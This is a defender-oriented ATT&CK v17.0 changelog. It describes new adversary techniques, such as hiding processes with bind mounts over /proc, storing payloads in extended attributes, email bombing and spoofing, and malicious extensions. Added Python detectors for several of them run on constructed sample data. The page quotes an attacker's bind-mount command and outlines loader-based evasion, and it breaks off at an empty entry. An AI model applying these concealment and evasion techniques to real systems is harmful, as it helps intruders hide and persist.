ATT&CK Changes Between v16.1 and v17.0
Key
- New objects: ATT&CK objects which are only present in the new release.
- Major version changes: ATT&CK objects that have a major version change. (e.g. 1.0 → 2.0)
- Minor version changes: ATT&CK objects that have a minor version change. (e.g. 1.0 → 1.1)
- Other version changes: ATT&CK objects that have a version change of any other kind. (e.g. 1.0 → 1.2)
- Patches: ATT&CK objects that have been patched while keeping the version the same. (e.g., 1.0 → 1.0 but something like a typo, a URL, or some metadata was fixed)
- Object revocations: ATT&CK objects which are revoked by a different object.
- Object deprecations: ATT&CK objects which are deprecated and no longer in use, and not replaced.
- Object deletions: ATT&CK objects which are no longer found in the STIX data.
Colors for description field (as rendered on the original page): Added, Changed, Deleted
Additional formats
These ATT&CK Navigator layer files can be uploaded to ATT&CK Navigator manually.
This JSON file contains the machine readable output used to create this page: changelog.json
Techniques
enterprise-attack
New Techniques
[T1564.013] Hide Artifacts: Bind Mounts
Current version: 1.0
Description:
Adversaries may abuse bind mounts on file structures to hide their activity and artifacts from native utilities. A bind mount maps a directory or file from one location on the filesystem to another, similar to a shortcut on Windows. It’s commonly used to provide access to specific files or directories across different environments, such as inside containers or chroot environments, and requires sudo access.
Adversaries may use bind mounts to map either an empty directory or a benign /proc directory to a malicious process’s /proc directory. Using the command mount -o bind /proc/benign-process /proc/malicious-process (or mount -B), the malicious process's /proc directory is overlaid with the contents of a benign process's /proc directory. When system utilities such as ps and top query process activity, the kernel follows the bind mount and presents the benign directory’s contents instead of the malicious process's actual /proc directory. As a result, these utilities display information that appears to come from the benign process, effectively hiding the malicious process's metadata, executable, or other artifacts from detection.(Citation: Cado Security Commando Cat 2024)(Citation: Ahn Lab CoinMiner 2023)
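Bind mounts over /proc can be detected from the mount table itself, because the kernel records every mount, binds included, in /proc/self/mountinfo. The script below is an added example written for this page, not code from ATT&CK or from the cited reports; the mountinfo lines it ships with are constructed. It flags any mount whose mount point lies inside a /proc/<PID> directory and any proc filesystem whose root is a subdirectory rather than /. Run it without arguments to check the live system (the file is world-readable); mountinfo shows only the caller's mount namespace, so container namespaces have to be entered separately.

```python
"""Detect bind mounts layered over /proc/<PID> directories.

Added example (not part of the ATT&CK page). It parses the
/proc/self/mountinfo format documented in proc(5) and flags any mount whose
mount point lies inside a /proc/<PID> directory, or any proc filesystem
whose root is not "/" (one process directory bound onto another).
"""
import re
import sys

# Constructed sample (not captured from a real host). Line 2 binds /proc/1000
# over /proc/4242; line 3 hides /proc/5151 behind an empty ext4 directory.
SAMPLE_MOUNTINFO = """\
25 1 0:22 / /proc rw,nosuid,nodev,noexec,relatime shared:5 - proc proc rw
38 25 0:22 /1000 /proc/4242 rw,nosuid,nodev,noexec,relatime shared:5 - proc proc rw
39 25 8:1 /tmp/empty /proc/5151 rw,relatime shared:1 - ext4 /dev/sda1 rw
40 1 8:1 /home/data /srv/data rw,relatime shared:1 - ext4 /dev/sda1 rw
"""

PROC_PID_RE = re.compile(r"^/proc/\d+(?:/|$)")


def _unescape(field):
    # mountinfo writes space, tab, newline and backslash as \ooo octal escapes.
    return re.sub(r"\\([0-7]{3})", lambda m: chr(int(m.group(1), 8)), field)


def parse_mountinfo(text):
    """Return one dict per mount. Fields before ' - ': mount id, parent id,
    major:minor, root, mount point, options, optional tags; after it:
    filesystem type, source, super-block options."""
    entries = []
    for line in text.splitlines():
        pre, sep, post = line.partition(" - ")
        pre_f, post_f = pre.split(), post.split()
        if not sep or len(pre_f) < 6 or len(post_f) < 2:
            continue  # blank or malformed line: skip rather than abort the scan
        entries.append({
            "mount_id": int(pre_f[0]),
            "parent_id": int(pre_f[1]),
            "root": _unescape(pre_f[3]),
            "mount_point": _unescape(pre_f[4]),
            "options": pre_f[5],
            "fstype": post_f[0],
            "source": _unescape(post_f[1]),
        })
    return entries


def find_proc_overlays(entries):
    """Return (mount point, reason) for every mount that can mask a process."""
    findings = []
    for e in entries:
        if PROC_PID_RE.match(e["mount_point"]):
            findings.append((e["mount_point"],
                             f"{e['fstype']} root {e['root']} mounted over a /proc/<PID> directory"))
        elif e["fstype"] == "proc" and e["root"] != "/":
            findings.append((e["mount_point"],
                             f"proc filesystem rooted at {e['root']} instead of /"))
    return findings


if __name__ == "__main__":
    # Pass a saved mountinfo file as the first argument, or read the live one.
    path = sys.argv[1] if len(sys.argv) > 1 else "/proc/self/mountinfo"
    with open(path, encoding="utf-8") as fh:
        hits = find_proc_overlays(parse_mountinfo(fh.read()))
    for mount_point, reason in hits:
        print(f"SUSPICIOUS {mount_point}: {reason}")
    print(f"{len(hits)} suspicious mount(s)")
```

A mount point under /proc/<PID> is rare enough in normal administration to alert on directly; the second rule catches a process directory bound somewhere outside /proc, which would otherwise pass the first one.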
[T1176.001] Software Extensions: Browser Extensions
Current version: 1.0
Description:
Adversaries may abuse internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality to and customize aspects of internet browsers. They can be installed directly via a local file or custom URL or through a browser's app store - an official online platform where users can browse, install, and manage extensions for a specific web browser. Extensions generally inherit the web browser's permissions previously granted.(Citation: Wikipedia Browser Extension)(Citation: Chrome Extensions Definition)
Malicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores, so it may not be difficult for malicious extensions to defeat automated scanners.(Citation: Malicious Chrome Extension Numbers) Depending on the browser, adversaries may also manipulate an extension's update URL to install updates from an adversary-controlled server or manipulate the mobile configuration file to silently install additional extensions.
Prior to macOS 11, adversaries could silently install browser extensions via the command line using the profiles tool to install malicious .mobileconfig files. In macOS 11+, the profiles tool can no longer install configuration profiles; however, .mobileconfig files can be planted and installed with user interaction.(Citation: xorrior chrome extensions macOS)
Once the extension is installed, it can browse to websites in the background, steal all information that a user enters into a browser (including credentials), and be used as an installer for a RAT for persistence.(Citation: Chrome Extension Crypto Miner)(Citation: ICEBRG Chrome Extensions)(Citation: Banker Google Chrome Extension Steals Creds)(Citation: Catch All Chrome Extension)
There have also been instances of botnets using a persistent backdoor through malicious Chrome extensions for Command and Control.(Citation: Stantinko Botnet)(Citation: Chrome Extension C2 Malware) Adversaries may also use browser extensions to modify browser permissions and components, privacy settings, and other security controls for Defense Evasion.(Citation: Browers FriarFox)(Citation: Browser Adrozek)
[T1671] Cloud Application Integration
Current version: 1.0
Description:
Adversaries may achieve persistence by leveraging OAuth application integrations in a software-as-a-service environment. Adversaries may create a custom application, add a legitimate application into the environment, or even co-opt an existing integration to achieve malicious ends.(Citation: Push Security SaaS Persistence 2022)(Citation: SaaS Attacks GitHub Evil Twin Integrations)
OAuth is an open standard that allows users to authorize applications to access their information on their behalf. In a SaaS environment such as Microsoft 365 or Google Workspace, users may integrate applications to improve their workflow and achieve tasks.
Leveraging application integrations may allow adversaries to persist in an environment – for example, by granting consent to an application from a high-privileged adversary-controlled account in order to maintain access to its data, even in the event of losing access to the account.(Citation: Wiz Midnight Blizzard 2024)(Citation: Microsoft Malicious OAuth Applications 2022)(Citation: Huntress Persistence Microsoft 365 Compromise 2024) In some cases, integrations may remain valid even after the original consenting user account is disabled.(Citation: Push Security Slack Persistence 2023) Application integrations may also allow adversaries to bypass multi-factor authentication requirements through the use of Application Access Tokens. Finally, they may enable persistent Automated Exfiltration over time.(Citation: Synes Cyber Corner Malicious Azure Application 2023)
Creating or adding a new application may require the adversary to create a dedicated Cloud Account for the application and assign it Additional Cloud Roles – for example, in Microsoft 365 environments, an application can only access resources via an associated service principal.(Citation: Microsoft Entra ID Service Principals)
[T1027.015] Obfuscated Files or Information: Compression
Current version: 1.0
Description:
Adversaries may use compression to obfuscate their payloads or files. Compressed file formats such as ZIP, gzip, 7z, and RAR can compress and archive multiple files together to make it easier and faster to transfer files. In addition to compressing files, adversaries may also compress shellcode directly - for example, in order to store it in a Windows Registry key (i.e., Fileless Storage).(Citation: Trustwave Pillowmint June 2020)
In order to further evade detection, adversaries may combine multiple ZIP files into one archive. This process of concatenation creates an archive that appears to be a single archive but in fact contains the central directories of the embedded archives. Some ZIP readers, such as 7zip, may not be able to identify concatenated ZIP files and miss the presence of the malicious payload.(Citation: Perception Point)
File archives may be sent as one Spearphishing Attachment through email. Adversaries have sent malicious payloads as archived files to encourage the user to interact with and extract the malicious payload onto their system (i.e., Malicious File).(Citation: NTT Security Flagpro new December 2021) However, some file compression tools, such as 7zip, can be used to produce self-extracting archives. Adversaries may send self-extracting archives to hide the functionality of their payload and launch it without requiring multiple actions from the user.(Citation: The Hacker News)
Compression may be used in combination with Encrypted/Encoded File where compressed files are encrypted and password-protected.
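The concatenation trick works because most readers honor only the last end-of-central-directory (EOCD) record. The script below is an added example, not part of the ATT&CK page or its sources: it builds two small archives in memory (constructed content), joins them back to back, and compares the entries Python's zipfile exposes with the entries found by walking every local file header in the raw bytes. More than one EOCD record, or names missing from the reader's view, marks the file as concatenated.

```python
"""Detect concatenated ZIP archives whose earlier members a reader may skip.

Added example, not from the ATT&CK page. Two archives are built in memory
(constructed content), joined, and then compared: the entries a standard
reader exposes (it trusts the last end-of-central-directory record) versus
the entries found by walking every local file header in the bytes.
"""
import io
import struct
import zipfile

LOCAL_HEADER_SIG = b"PK\x03\x04"
EOCD_SIG = b"PK\x05\x06"


def make_zip(files):
    """Build a ZIP in memory from {name: bytes}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in files.items():
            zf.writestr(name, data)
    return buf.getvalue()


def find_eocd_records(data):
    """Byte offsets of every end-of-central-directory signature."""
    offsets, pos = [], data.find(EOCD_SIG)
    while pos >= 0:
        offsets.append(pos)
        pos = data.find(EOCD_SIG, pos + len(EOCD_SIG))
    return offsets


def walk_local_headers(data):
    """Names of every entry found by walking local file headers in order.
    A header is 30 bytes + name + extra, followed by the compressed data;
    the compressed-size field (offset 18) is 0 when a data descriptor is
    used, in which case the walk falls back to searching for the next
    signature."""
    names, pos = [], data.find(LOCAL_HEADER_SIG)
    while pos >= 0 and pos + 30 <= len(data):
        comp_size, = struct.unpack_from("<I", data, pos + 18)
        name_len, extra_len = struct.unpack_from("<HH", data, pos + 26)
        names.append(data[pos + 30:pos + 30 + name_len].decode("utf-8", "replace"))
        pos = data.find(LOCAL_HEADER_SIG, pos + 30 + name_len + extra_len + comp_size)
    return names


def analyze_zip(data):
    """Compare what a reader sees with what the bytes contain."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        reader_names = zf.namelist()
    all_names = walk_local_headers(data)
    hidden = sorted(set(all_names) - set(reader_names))
    eocd_count = len(find_eocd_records(data))
    return {
        "eocd_records": eocd_count,
        "reader_names": reader_names,
        "all_names": all_names,
        "hidden": hidden,
        "concatenated": eocd_count > 1 or bool(hidden),
    }


def demo():
    """Concatenate a benign archive with a second one and analyze the result."""
    benign = make_zip({"readme.txt": b"constructed benign content"})
    second = make_zip({"update.txt": b"constructed placeholder, not a real payload"})
    return analyze_zip(benign + second)


if __name__ == "__main__":
    result = demo()
    print("reader sees:", result["reader_names"])
    print("bytes contain:", result["all_names"])
    print("hidden from reader:", result["hidden"], "| concatenated:", result["concatenated"])
```

Walking by compressed size keeps a stored nested ZIP from being mistaken for extra headers; entries written with data descriptors fall back to signature search, and ZIP64 archives (sizes of 0xFFFFFFFF in the local header) are not handled here.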
[T1675] ESXi Administration Command
Current version: 1.0
Description:
Adversaries may abuse ESXi administration services to execute commands on guest machines hosted within an ESXi virtual environment. Persistent background services on ESXi-hosted VMs, such as the VMware Tools Daemon Service, allow for remote management from the ESXi server. The tools daemon service runs as vmtoolsd.exe on Windows guest operating systems, vmware-tools-daemon on macOS, and vmtoolsd on Linux.(Citation: Broadcom VMware Tools Services)
Adversaries may leverage a variety of tools to execute commands on ESXi-hosted VMs – for example, by using the vSphere Web Services SDK to programmatically execute commands and scripts via APIs such as StartProgramInGuest, ListProcessesInGuest, ListFileInGuest, and InitiateFileTransferFromGuest.(Citation: Google Cloud Threat Intelligence VMWare ESXi Zero-Day 2023)(Citation: Broadcom Running Guest OS Operations) This may enable follow-on behaviors on the guest VMs, such as File and Directory Discovery, Data from Local System, or OS Credential Dumping.
[T1667] Email Bombing
Current version: 1.0
Description:
Adversaries may flood targeted email addresses with an overwhelming volume of messages. This may bury legitimate emails in a flood of spam and disrupt business operations.(Citation: sophos-bombing)(Citation: krebs-email-bombing)
An adversary may accomplish email bombing by leveraging an automated bot to register a targeted address for e-mail lists that do not validate new signups, such as online newsletters. The result can be a wave of thousands of e-mails that effectively overloads the victim’s inbox.(Citation: krebs-email-bombing)(Citation: hhs-email-bombing)
By sending hundreds or thousands of e-mails in quick succession, adversaries may successfully divert attention away from and bury legitimate messages including security alerts, daily business processes like help desk tickets and client correspondence, or ongoing scams.(Citation: hhs-email-bombing) This behavior can also be used as a tool of harassment.(Citation: krebs-email-bombing)
This behavior may be a precursor for Spearphishing Voice. For example, an adversary may email bomb a target and then follow up with a phone call to fraudulently offer assistance. This social engineering may lead to the use of Remote Access Software to steal credentials, deploy ransomware, conduct Financial Theft(Citation: sophos-bombing), or engage in other malicious activity.(Citation: rapid7-email-bombing)
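Because the flood arrives from many unrelated senders rather than one source, a per-sender rate limit misses it, while counting distinct sender domains per recipient catches it. The script below is an added example, not from the ATT&CK page or the cited reports; it runs a sliding-window check over delivery-log lines in a simplified, constructed format (timestamp, to=, from=). The thresholds and the log format are assumptions to adapt to the real mail gateway.

```python
"""Flag inboxes receiving a burst of mail from many unrelated senders.

Added example, not from the ATT&CK page. It consumes simplified delivery-log
lines (constructed format, one message per line) and alerts when a recipient
receives at least `min_msgs` messages from at least `min_domains` distinct
sender domains inside a sliding time window.
"""
from collections import Counter, defaultdict
from datetime import datetime, timedelta
import re

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+to=(?P<to>\S+)\s+from=(?P<from>\S+)")

# Constructed sample log: 3 normal messages to alice, then 30 newsletter
# welcomes to alice within two minutes, plus a few messages to bob.
SAMPLE_LOG = (
    [f"2025-04-22T09:0{i}:00Z to=alice@example.com from=colleague@example.com" for i in range(3)]
    + [f"2025-04-22T10:00:{i * 4:02d}Z to=alice@example.com from=news@list{i}.example" for i in range(15)]
    + [f"2025-04-22T10:01:{i * 4:02d}Z to=alice@example.com from=promo@shop{i}.example" for i in range(15)]
    + [f"2025-04-22T10:00:{i * 10:02d}Z to=bob@example.com from=news@list{i}.example" for i in range(5)]
)


def parse_line(line):
    """Return {"ts", "to", "from_domain"} or None for lines that don't match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.fromisoformat(m["ts"].replace("Z", "+00:00"))
    return {"ts": ts, "to": m["to"].lower(),
            "from_domain": m["from"].rpartition("@")[2].lower()}


def detect_bombing(lines, window=timedelta(minutes=5), min_msgs=20, min_domains=10):
    """Return {recipient: {"messages", "domains", "window_end"}} for each
    recipient whose busiest window meets both thresholds."""
    by_rcpt = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev:
            by_rcpt[ev["to"]].append((ev["ts"], ev["from_domain"]))
    alerts = {}
    for rcpt, events in by_rcpt.items():
        events.sort()
        in_window = Counter()   # sender domain -> messages currently inside the window
        start = 0
        for end, (ts, domain) in enumerate(events):
            in_window[domain] += 1
            # Slide the window start forward until it spans at most `window`.
            while ts - events[start][0] > window:
                old = events[start][1]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                start += 1
            count = end - start + 1
            if count >= min_msgs and len(in_window) >= min_domains:
                best = alerts.get(rcpt)
                if best is None or count > best["messages"]:
                    alerts[rcpt] = {"messages": count, "domains": len(in_window), "window_end": ts}
    return alerts


if __name__ == "__main__":
    for rcpt, info in detect_bombing(SAMPLE_LOG).items():
        print(f"{rcpt}: {info['messages']} messages from {info['domains']} domains by {info['window_end']}")
```

The distinct-domain requirement is what separates a bombing run from a legitimately busy mailbox, such as a shared ticket queue receiving many messages from one or two systems.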
[T1672] Email Spoofing
Current version: 1.0
Description:
Adversaries may fake, or spoof, a sender’s identity by modifying the value of relevant email headers in order to establish contact with victims under false pretenses.(Citation: Proofpoint TA427 April 2024) In addition to actual email content, email headers (such as the FROM header, which contains the email address of the sender) may also be modified. Email clients display these headers when emails appear in a victim's inbox, which may cause modified emails to appear as if they were from the spoofed entity.
This behavior may succeed when the spoofed entity either does not enable or enforce identity authentication tools such as Sender Policy Framework (SPF), DomainKeys Identified Mail (DKIM), and/or Domain-based Message Authentication, Reporting and Conformance (DMARC).(Citation: Cloudflare DMARC, DKIM, and SPF)(Citation: DMARC-overview)(Citation: Proofpoint-DMARC) Even if SPF and DKIM are configured properly, spoofing may still succeed when a domain sets a weak DMARC policy such as "v=DMARC1; p=none; fo=1;". This means that while DMARC is technically present, email servers are not instructed to take any filtering action when emails fail authentication checks.(Citation: Proofpoint TA427 April 2024)(Citation: ic3-dprk)
Adversaries may abuse absent or weakly configured SPF, DKIM, and/or DMARC policies to conceal social engineering attempts(Citation: ic3-dprk) such as Phishing. They may also leverage email spoofing for Impersonation of legitimate external individuals and organizations, such as journalists and academics.(Citation: ic3-dprk)
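The policy strings discussed here can be assessed mechanically. The script below is an added example, not from the ATT&CK page or the cited sources: it parses a DMARC record and classifies it as absent, monitor-only, partial or enforcing, does the same for an SPF record's terminating mechanism, and checks strict From/Return-Path domain alignment on a constructed sample message. Records are passed in as strings (for instance the output of dig TXT _dmarc.example.com); no DNS lookups are performed.

```python
"""Assess a domain's DMARC and SPF records and check From/Return-Path alignment.

Added example, not from the ATT&CK page. The record strings are passed in
(fetch them with `dig TXT _dmarc.example.com` and `dig TXT example.com`);
the message below is a constructed sample.
"""
from email import message_from_string
from email.utils import parseaddr


def parse_dmarc(record):
    """Return the tag=value pairs of a DMARC record, or None if it is not one."""
    tags = {}
    for part in (record or "").split(";"):
        key, sep, value = part.partition("=")
        if sep:
            tags[key.strip().lower()] = value.strip()
    return tags if tags.get("v", "").upper() == "DMARC1" else None


def assess_dmarc(record):
    """Classify how much protection the published DMARC policy gives."""
    tags = parse_dmarc(record)
    if tags is None:
        return ("absent", "no valid DMARC record: receivers apply no policy to spoofed mail")
    policy = tags.get("p", "").lower()
    pct = int(tags["pct"]) if tags.get("pct", "").isdigit() else 100
    if policy == "none":
        return ("monitor-only", "p=none: failures are reported (rua/ruf) but still delivered")
    if policy not in ("quarantine", "reject"):
        return ("invalid", f"unrecognised or missing p= tag: {policy!r}")
    if pct < 100:
        return ("partial", f"p={policy} is applied to only {pct}% of failing mail (pct={pct})")
    if tags.get("sp", policy).lower() == "none":
        return ("partial", "sp=none: subdomains can still be spoofed")
    outcome = "quarantined" if policy == "quarantine" else "rejected"
    return ("enforcing", f"p={policy}: failing mail is {outcome}")


def assess_spf(record):
    """Classify the SPF record by its terminating 'all' mechanism."""
    if not record or not record.lower().startswith("v=spf1"):
        return ("absent", "no SPF record")
    last = record.split()[-1].lower()
    if last == "-all":
        return ("hard-fail", "unauthorised senders fail SPF")
    if last == "~all":
        return ("soft-fail", "unauthorised senders only soft-fail; DMARC decides the outcome")
    if last in ("?all", "+all", "all"):
        return ("permissive", f"'{last}' lets any host pass SPF")
    return ("no-all", "record ends without an 'all' mechanism")


def from_alignment(raw_message):
    """Return (header From domain, Return-Path domain, strictly aligned?).
    DMARC relaxed alignment also accepts a shared organisational domain."""
    msg = message_from_string(raw_message)
    from_domain = parseaddr(msg.get("From", ""))[1].rpartition("@")[2].lower()
    rp_domain = parseaddr(msg.get("Return-Path", ""))[1].rpartition("@")[2].lower()
    return (from_domain, rp_domain, bool(from_domain) and from_domain == rp_domain)


# Constructed sample: the visible From claims example.com, the bounce address does not.
SAMPLE_MESSAGE = """\
Return-Path: <bounce-42@mailer.example.net>
From: "Finance Director" <director@example.com>
To: staff@example.com
Subject: Urgent wire transfer

Please process the attached invoice today.
"""

if __name__ == "__main__":
    for rec in ("v=DMARC1; p=none; fo=1;", "v=DMARC1; p=reject; rua=mailto:dmarc@example.com", None):
        print(rec, "->", assess_dmarc(rec))
    print(assess_spf("v=spf1 include:_spf.example.net ~all"))
    print(from_alignment(SAMPLE_MESSAGE))
```

The alignment check is deliberately strict; a receiver applying DMARC's default relaxed mode would also accept a Return-Path in a subdomain of the From domain, so treat a mismatch here as a prompt to look at the Authentication-Results header rather than as a verdict on its own.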
[T1668] Exclusive Control
Current version: 1.0
Description:
Adversaries who successfully compromise a system may attempt to maintain persistence by “closing the door” behind them – in other words, by preventing other threat actors from initially accessing or maintaining a foothold on the same system.
For example, adversaries may patch a vulnerable, compromised system(Citation: Mandiant-iab-control)(Citation: CERT AT Fortinent Ransomware 2025) to prevent other threat actors from leveraging that vulnerability in the future. They may “close the door” in other ways, such as disabling vulnerable services(Citation: sophos-multiple-attackers), stripping privileges from accounts(Citation: aquasec-postgres-processes), or removing other malware already on the compromised device.(Citation: fsecure-netsky)
Hindering other threat actors may allow an adversary to maintain sole access to a compromised system or network. This prevents the threat actor from needing to compete with or even being removed themselves by other threat actors. It also reduces the “noise” in the environment, lowering the possibility of being caught and evicted by defenders. Finally, in the case of Resource Hijacking, leveraging a compromised device’s full power allows the threat actor to maximize profit.(Citation: sophos-multiple-attackers)
[T1564.014] Hide Artifacts: Extended Attributes
Current version: 1.0
Description:
Adversaries may abuse extended attributes (xattrs) on macOS and Linux to hide their malicious data in order to evade detection. Extended attributes are key-value pairs of file and directory metadata used by both macOS and Linux. They are not visible through standard tools like Finder, ls, or cat and require utilities such as xattr (macOS) or getfattr (Linux) for inspection. Operating systems and applications use xattrs for tagging, integrity checks, and access control. On Linux, xattrs are organized into namespaces such as "user." (user permissions), "trusted." (root permissions), "security.", and "system.", each with specific permissions. On macOS, xattrs are flat strings without namespace prefixes, commonly prefixed with com.apple.* (e.g., com.apple.quarantine, com.apple.metadata:_kMDItemUserTags) and used by system features like Gatekeeper and Spotlight.(Citation: Establishing persistence using extended attributes on Linux)
An adversary may leverage xattrs by embedding a second-stage payload into the extended attribute of a legitimate file. On macOS, a payload can be embedded into a custom attribute using the xattr command. A separate loader can retrieve the attribute with xattr -p, decode the content, and execute it using a scripting interpreter. On Linux, an adversary may use setfattr to write a payload into the "user." namespace of a legitimate file. A loader script can later extract the payload with getfattr --only-values, decode it, and execute it using bash or another interpreter. In both cases, because the primary file content remains unchanged, security tools and integrity checks that do not inspect extended attributes will observe the original file hash, allowing the malicious payload to evade detection.(Citation: Low GroupIB xattrs nov 2024)
[T1059.012] Command and Scripting Interpreter: Hypervisor CLI
Current version: 1.0
Description:
Adversaries may abuse hypervisor command line interpreters (CLIs) to execute malicious commands. Hypervisor CLIs typically enable a wide variety of functionality for managing both the hypervisor itself and the guest virtual machines it hosts.
For example, on ESXi systems, tools such as esxcli and vim-cmd allow administrators to configure firewall rules and log forwarding on the hypervisor, list virtual machines, start and stop virtual machines, and more.(Citation: Broadcom ESXCLI Reference)(Citation: Crowdstrike Hypervisor Jackpotting Pt 2 2021)(Citation: LOLESXi) Adversaries may be able to leverage these tools in order to support further actions, such as File and Directory Discovery or Data Encrypted for Impact.
[T1176.002] Software Extensions: IDE Extensions
Current version: 1.0
Description:
Adversaries may abuse an integrated development environment (IDE) extension to establish persistent access to victim systems.(Citation: Mnemonic misuse visual studio) IDEs such as Visual Studio Code, IntelliJ IDEA, and Eclipse support extensions - software components that add features like code linting, auto-completion, task automation, or integration with tools like Git and Docker. A malicious extension can be installed through an extension marketplace (i.e., Compromise Software Dependencies and Development Tools) or side-loaded directly into the IDE.(Citation: Abramovsky VSCode Security)(Citation: Lakshmanan Visual Studio Marketplace)
In addition to installing malicious extensions, adversaries may also leverage benign ones. For example, adversaries may establish persistent SSH tunnels via the use of the VSCode Remote SSH extension (i.e., IDE Tunneling).
Trust is typically established through the installation process; once installed, the malicious extension is run every time that the IDE is launched. The extension can then be used to execute arbitrary code, establish a backdoor, mine cryptocurrency, or exfiltrate data.(Citation: ExtensionTotal VSCode Extensions 2025)
[T1219.001] Remote Access Tools: IDE Tunneling
Current version: 1.0
Description:
Adversaries may abuse Integrated Development Environment (IDE) software with remote development features to establish an interactive command and control channel on target systems within a network. IDE tunneling combines SSH, port forwarding, file sharing, and debugging into a single secure connection, letting developers work on remote systems as if they were local. Unlike SSH and port forwarding, IDE tunneling encapsulates an entire session and may use proprietary tunneling protocols alongside SSH, allowing adversaries to blend in with legitimate development workflows. Some IDEs, like Visual Studio Code, also provide CLI tools (e.g., code tunnel) that adversaries may use to programmatically establish tunnels and generate web-accessible URLs for remote access. These tunnels can be authenticated through accounts such as GitHub, enabling the adversary to control the compromised system via a legitimate developer portal.(Citation: sentinelone operationDigitalEye Dec 2024)(Citation: Unit42 Chinese VSCode 06 September 2024)(Citation: Thornton tutorial VSCode shell September 2023)
Additionally, adversaries may use IDE tunneling for persistence. Some IDEs, such as Visual Studio Code and JetBrains, support automatic reconnection. Adversaries may configure the IDE to auto-launch at startup, re-establishing the tunnel upon execution. Compromised developer machines may also be exploited as jump hosts to move further into the network.
IDE tunneling tools may be built-in or installed as IDE Extensions.
[T1674] Input Injection
Current version: 1.0
Description:
Adversaries may simulate keystrokes on a victim’s computer by various means to perform any type of action on behalf of the user, such as launching the command interpreter using keyboard shortcuts, typing an inline script to be executed, or interacting directly with a GUI-based application. These actions can be preprogrammed into adversary tooling or executed through physical devices such as Human Interface Devices (HIDs).
For example, adversaries have used tooling that monitors the Windows message loop to detect when a user visits bank-specific URLs. If detected, the tool then simulates keystrokes to open the developer console or select the address bar, pastes malicious JavaScript from the clipboard, and executes it - enabling manipulation of content within the browser, such as replacing bank account numbers during transactions.(Citation: BleepingComputer BackSwap)(Citation: welivesecurity BackSwap)
Adversaries have also used malicious USB devices to emulate keystrokes that launch PowerShell, leading to the download and execution of malware from adversary-controlled servers.(Citation: BleepingComputer USB)
[T1127.003] Trusted Developer Utilities Proxy Execution: JamPlus
Current version: 1.0
Description:
Adversaries may use JamPlus to proxy the execution of a malicious script. JamPlus is a build utility tool for code and data build systems. It works with several popular compilers and can be used for generating workspaces in code editors such as Visual Studio.(Citation: JamPlus manual)
Adversaries may abuse the JamPlus build utility to execute malicious scripts via a .jam file, which describes the build process and required dependencies. Because the malicious script is executed from a reputable developer tool, it may subvert application control security systems such as Smart App Control.(Citation: Cyble)(Citation: Elastic Security Labs)
[T1027.016] Obfuscated Files or Information: Junk Code Insertion
Current version: 1.0
Description:
Adversaries may use junk code / dead code to obfuscate a malware’s functionality. Junk code is code that either does not execute, or if it does execute, does not change the functionality of the code. Junk code makes analysis more difficult and time-consuming, as the analyst steps through non-functional code instead of analyzing the main code. It also may hinder detections that rely on static code analysis due to the use of benign functionality, especially when combined with Compression or Software Packing.(Citation: ReasonLabs)(Citation: ReasonLabs Cyberpedia Junk Code)
No-Operation (NOP) instructions are an example of dead code commonly used in x86 assembly language, where the single-byte NOP is encoded as opcode 0x90. When NOPs are added to malware, the disassembler shows the NOP instructions, and the analyst must step through them.(Citation: ReasonLabs)
The use of junk / dead code insertion is distinct from Binary Padding because the purpose is to obfuscate the functionality of the code, rather than simply to change the malware’s signature.
[T1204.004] User Execution: Malicious Copy and Paste
Current version: 1.0
Description:
An adversary may rely upon a user copying and pasting code in order to gain execution. Users may be subjected to social engineering to get them to copy and paste code directly into a Command and Scripting Interpreter.
Malicious websites, such as those used in Drive-by Compromise, may present fake error messages or CAPTCHA prompts that instruct users to open a terminal or the Windows Run Dialog box and execute an arbitrary command. These commands may be obfuscated using encoding or other techniques to conceal malicious intent. Once executed, the adversary will typically be able to establish a foothold on the victim's machine.(Citation: CloudSEK Lumma Stealer 2024)(Citation: Sekoia ClickFake 2025)(Citation: Reliaquest CAPTCHA 2024)
Adversaries may also leverage phishing emails for this purpose. When a user attempts to open an attachment, they may be presented with a fake error and offered a malicious command to paste as a solution.(Citation: Proofpoint ClickFix 2024)
Tricking a user into executing a command themselves may help to bypass email filtering, browser sandboxing, or other mitigations designed to protect users against malicious downloaded files.
[T1036.011] Masquerading: Overwrite Process Arguments
Current version: 1.0
Description:
Adversaries may modify a process's in-memory arguments to change its name in order to appear as a legitimate or benign process. On Linux, the operating system stores command-line arguments in the process’s stack and passes them to the main() function as the argv array. The first element, argv[0], typically contains the process name or path - by default, the command used to actually start the process (e.g., cat /etc/passwd). By default, the Linux /proc filesystem uses this value to represent the process name. The /proc/<PID>/cmdline file reflects the contents of this memory, and tools like ps use it to display process information. Since arguments are stored in user-space memory at launch, this modification can be performed without elevated privileges.
During runtime, adversaries can erase the memory used by all command-line arguments for a process, overwriting each argument string with null bytes. This removes evidence of how the process was originally launched. They can then write a spoofed string into the memory region previously occupied by argv[0] to mimic a benign command, such as cat resolv.conf. The new command-line string is reflected in /proc/<PID>/cmdline and displayed by tools like ps.(Citation: Sandfly BPFDoor 2022)(Citation: Microsoft XorDdos Linux Stealth 2022)
[T1219.003] Remote Access Tools: Remote Access Hardware
Current version: 1.0
Description:
An adversary may use legitimate remote access hardware to establish an interactive command and control channel to target systems within networks. These services, including IP-based keyboard, video, or mouse (KVM) devices such as TinyPilot and PiKVM, are commonly used as legitimate tools and may be allowed by peripheral device policies within a target environment.
Remote access hardware may be physically installed and used post-compromise as an alternate communications channel for redundant access or as a way to establish an interactive remote session with the target system. Using hardware-based remote access tools may allow threat actors to bypass software security solutions and gain more control over the compromised device(s).(Citation: Palo Alto Unit 42 North Korean IT Workers 2024)(Citation: Google Cloud Threat Intelligence DPRK IT Workers 2024)
[T1219.002] Remote Access Tools: Remote Desktop Software
Current version: 1.0
Description:
